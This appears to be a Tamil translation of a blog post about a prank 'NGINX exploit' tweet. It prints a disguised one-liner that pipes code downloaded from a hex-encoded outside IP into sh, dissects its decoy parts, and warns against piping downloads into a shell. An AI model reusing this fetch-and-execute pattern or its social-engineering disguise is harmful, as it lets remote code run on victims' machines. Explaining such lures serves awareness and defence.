குறிப்பு. மொழிபெயர்:
TL;DR: எந்த சூழ்நிலையிலும் கோப்பு பைப்லைனிங்கை sh அல்லது bash இல் பயன்படுத்த வேண்டாம். உங்கள் கணினியின் கட்டுப்பாட்டை இழக்க இது ஒரு சிறந்த வழியாகும்.
மே 31 அன்று உருவாக்கப்பட்ட காமிக் PoC சுரண்டல் பற்றிய சிறுகதையை உங்களுடன் பகிர்ந்து கொள்ள விரும்புகிறேன். செய்திகளுக்கு பதிலளிக்கும் வகையில் அவர் உடனடியாக தோன்றினார்
கர்லில் ஒரு புதிய தெளிவின்மை நுட்பத்தில் வேலை செய்து முடித்த பிறகு, நான் அசல் ட்வீட்டை மேற்கோள் காட்டினேன் மற்றும் கண்டுபிடிக்கப்பட்ட பாதிப்பை பயன்படுத்திக் கொள்ளக்கூடிய ஒற்றை வரி குறியீட்டைக் கொண்ட “ஒரு வேலை செய்யும் PoCயை கசிந்தேன்”. நிச்சயமாக, இது முழு முட்டாள்தனமாக இருந்தது. நான் உடனடியாக அம்பலப்படுத்தப்படுவேன் என்று கருதினேன், மேலும் சிறந்த முறையில் நான் இரண்டு ரீட்வீட்களைப் பெறுவேன் (ஆமாம்).
இருப்பினும், அடுத்து என்ன நடந்தது என்பதை என்னால் கற்பனை செய்து பார்க்க முடியவில்லை. எனது ட்வீட்டின் புகழ் உயர்ந்தது. ஆச்சரியப்படும் விதமாக, இந்த நேரத்தில் (15:00 மாஸ்கோ நேரம் ஜூன் 1) இது ஒரு போலி என்பதை சிலர் உணர்ந்துள்ளனர். பலர் அதைச் சரிபார்க்காமலேயே மறு ட்வீட் செய்கிறார்கள் (இது வெளியிடும் அழகான ASCII கிராபிக்ஸைப் பாராட்டுவது ஒருபுறம் இருக்கட்டும்).
எவ்வளவு அழகாக இருக்கிறது என்று பாருங்கள்!
இந்த சுழல்கள் மற்றும் வண்ணங்கள் அனைத்தும் சிறப்பாக இருந்தாலும், மக்கள் அவற்றைப் பார்க்க தங்கள் கணினியில் குறியீட்டை இயக்க வேண்டும் என்பது தெளிவாகிறது. அதிர்ஷ்டவசமாக, உலாவிகள் அதே வழியில் செயல்படுகின்றன, மேலும் நான் சட்டச் சிக்கலில் சிக்க விரும்பவில்லை என்ற உண்மையுடன் இணைந்து, எனது தளத்தில் புதைக்கப்பட்ட குறியீடு எந்த கூடுதல் குறியீட்டையும் நிறுவவோ அல்லது செயல்படுத்தவோ முயற்சிக்காமல் எதிரொலி அழைப்புகளைச் செய்கிறது.
சிறிய விலகல்:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
சமூக-மின்னணு பொறியியல் (SEE) - ஃபிஷிங்கை விட அதிகம்
பாதுகாப்பு மற்றும் பரிச்சயம் இந்த சோதனையின் முக்கிய பகுதியாகும். அவைதான் அவரது வெற்றிக்கு வழிவகுத்தது என்று நினைக்கிறேன். கட்டளை வரி "127.0.0.1" (நன்கு அறியப்பட்ட லோக்கல் ஹோஸ்ட்) ஐக் குறிப்பிடுவதன் மூலம் பாதுகாப்பைக் குறிக்கிறது. Localhost பாதுகாப்பானதாகக் கருதப்படுகிறது மேலும் அதில் உள்ள தரவு உங்கள் கணினியை விட்டு வெளியேறாது.
பரிச்சயம் சோதனையின் இரண்டாவது முக்கிய SEE கூறு ஆகும். இலக்கு பார்வையாளர்கள் முதன்மையாக கணினி பாதுகாப்பின் அடிப்படைகளை நன்கு அறிந்தவர்களைக் கொண்டிருப்பதால், குறியீட்டை உருவாக்குவது முக்கியம், அதன் சில பகுதிகள் நன்கு தெரிந்ததாகவும் நன்கு தெரிந்ததாகவும் (எனவே பாதுகாப்பானது). பழைய சுரண்டல் கருத்துகளின் கூறுகளை கடன் வாங்குவது மற்றும் அசாதாரணமான முறையில் அவற்றை இணைப்பது மிகவும் வெற்றிகரமாக நிரூபிக்கப்பட்டுள்ளது.
ஒன்-லைனரின் விரிவான பகுப்பாய்வு கீழே உள்ளது. இந்த பட்டியலில் உள்ள அனைத்தும் அணிந்துள்ளன ஒப்பனை இயல்பு, மற்றும் நடைமுறையில் அதன் உண்மையான செயல்பாட்டிற்கு எதுவும் தேவையில்லை.
என்ன கூறுகள் உண்மையில் அவசியம்? இது -gsS
, -O 0x0238f06a
, |sh
மற்றும் இணைய சேவையகம். வலை சேவையகத்தில் தீங்கிழைக்கும் வழிமுறைகள் எதுவும் இல்லை, ஆனால் கட்டளைகளைப் பயன்படுத்தி ASCII கிராபிக்ஸ் வழங்கப்பட்டுள்ளது echo
உள்ள ஸ்கிரிப்ட்டில் index.html
. பயனர் ஒரு வரியை உள்ளிடும்போது |sh
மத்தியில், index.html
ஏற்றப்பட்டு செயல்படுத்தப்பட்டது. அதிர்ஷ்டவசமாக, வலை சேவையகத்தின் பாதுகாவலர்களுக்கு எந்த தவறான நோக்கமும் இல்லை.
-
../../../%00
- அடைவுக்கு அப்பால் செல்வதைக் குறிக்கிறது; -
ngx_stream_module.so
- சீரற்ற NGINX தொகுதிக்கான பாதை; -
/bin/sh%00<'protocol:TCP'
- நாங்கள் தொடங்குகிறோம் என்று கூறப்படுகிறது/bin/sh
இலக்கு கணினியில் மற்றும் வெளியீட்டை TCP சேனலுக்கு திருப்பி விடவும்; -
-O 0x0238f06a#PLToffset
- இரகசிய மூலப்பொருள், கூடுதலாக#PLToffset
, PLT இல் உள்ள நினைவக ஆஃப்செட் போல் தோற்றமளிக்க; -
|sh;
- மற்றொரு முக்கியமான துண்டு. தாக்கும் இணைய சேவையகத்திலிருந்து வரும் குறியீட்டை இயக்க, வெளியீட்டை sh/bash க்கு திருப்பிவிட வேண்டும்.0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- நெட்கேட் குறிப்பிடும் போலி/dev/tcp/localhost
அதனால் எல்லாம் மீண்டும் பாதுகாப்பாக இருக்கும். உண்மையில், இது எதுவும் செய்யாது மற்றும் அழகுக்கான வரிசையில் சேர்க்கப்பட்டுள்ளது.
இது ஒரு வரி ஸ்கிரிப்ட்டின் டிகோடிங் மற்றும் "சமூக-மின்னணு பொறியியல்" (சிக்கலான ஃபிஷிங்) அம்சங்களைப் பற்றிய விவாதத்தை முடிக்கிறது.
இணைய சேவையக கட்டமைப்பு மற்றும் எதிர் நடவடிக்கைகள்
எனது சந்தாதாரர்களில் பெரும்பாலோர் இன்ஃபோசெக்/ஹேக்கர்களாக இருப்பதால், தோழர்கள் ஏதாவது செய்ய வேண்டும் என்பதற்காக (அது வேடிக்கையாக இருக்கும்) அவர்களின் பங்கில் உள்ள "ஆர்வம்" வெளிப்பாடுகளுக்கு இணைய சேவையகத்தை இன்னும் கொஞ்சம் எதிர்ப்புத் தெரிவிக்க முடிவு செய்தேன். அமைக்கவும்). சோதனை இன்னும் நடந்துகொண்டிருப்பதால் எல்லா இடர்பாடுகளையும் இங்கே பட்டியலிடப் போவதில்லை, ஆனால் சர்வர் செய்யும் சில விஷயங்கள் இங்கே உள்ளன:
- சில சமூக வலைப்பின்னல்களில் விநியோக முயற்சிகளை செயலில் கண்காணிக்கிறது மற்றும் இணைப்பை கிளிக் செய்ய பயனரை ஊக்குவிக்க பல்வேறு முன்னோட்ட சிறுபடங்களை மாற்றுகிறது.
- ஷெல் ஸ்கிரிப்டைக் காட்டுவதற்குப் பதிலாக, குரோம்/மொசில்லா/சஃபாரி/இதனை துக்க்ரவுட் விளம்பர வீடியோவுக்குத் திருப்பிவிடும்.
- ஊடுருவல்/அப்பட்டமான ஹேக்கிங்கின் வெளிப்படையான அறிகுறிகளைக் கண்டறிந்து, பின்னர் கோரிக்கைகளை NSA சேவையகங்களுக்குத் திருப்பிவிடத் தொடங்குகிறது (ha!).
- வழக்கமான உலாவியில் இருந்து ஹோஸ்டைப் பார்வையிடும் அனைத்து கணினிகளிலும் ட்ரோஜனையும், பயாஸ் ரூட்கிட்டையும் நிறுவுகிறது (வேடிக்கைக்கு!).
ஆன்டிமர்களின் ஒரு சிறிய பகுதி
இந்த விஷயத்தில், அப்பாச்சியின் சில அம்சங்களில் தேர்ச்சி பெறுவதே எனது ஒரே குறிக்கோளாக இருந்தது - குறிப்பாக, கோரிக்கைகளைத் திருப்பிவிடுவதற்கான சிறந்த விதிகள் - நான் நினைத்தேன்: ஏன் இல்லை?
NGINX சுரண்டல் (உண்மை!)
குழுசேர்
ஆதாரம்: www.habr.com